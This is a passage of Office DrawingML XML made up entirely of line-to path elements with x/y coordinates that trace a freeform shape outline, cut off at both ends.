                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="496" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="42"/>
